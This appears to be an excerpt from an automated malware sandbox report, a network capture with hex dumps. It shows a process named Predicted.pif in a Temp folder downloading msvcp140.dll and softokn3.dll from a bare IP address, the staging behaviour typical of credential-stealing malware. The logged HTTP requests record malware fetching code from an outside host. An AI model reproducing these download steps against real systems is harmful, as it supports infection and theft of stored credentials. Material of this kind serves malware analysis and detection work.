2024-08-19 04:06:12 UTC	16384	IN	Data Raw: 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-08-19 04:06:12 UTC	16384	IN	Data Raw: c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-08-19 04:06:12 UTC	16384	IN	Data Raw: 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-08-19 04:06:12 UTC	16384	IN	Data Raw: ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc Data Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-08-19 04:06:12 UTC	16384	IN	Data Raw: 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-08-19 04:06:12 UTC	16384	IN	Data Raw: 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
2024-08-19 04:06:12 UTC	16384	IN	Data Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-08-19 04:06:12 UTC	16384	IN	Data Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49881	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:14 UTC	227	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:14 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:14 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Monday, 19-Aug-2024 04:06:14 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-08-19 04:06:14 UTC	16124	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-08-19 04:06:14 UTC	16384	IN	Data Raw: 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr
2024-08-19 04:06:14 UTC	16384	IN	Data Raw: 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-08-19 04:06:14 UTC	16384	IN	Data Raw: 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-08-19 04:06:14 UTC	16384	IN	Data Raw: 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-08-19 04:06:14 UTC	16384	IN	Data Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
2024-08-19 04:06:14 UTC	16384	IN	Data Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
2024-08-19 04:06:14 UTC	16384	IN	Data Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
2024-08-19 04:06:14 UTC	16384	IN	Data Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|i
2024-08-19 04:06:14 UTC	16384	IN	Data Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49884	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:15 UTC	227	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:16 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:16 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Monday, 19-Aug-2024 04:06:16 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-08-19 04:06:16 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-08-19 04:06:16 UTC	16384	IN	Data Raw: 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
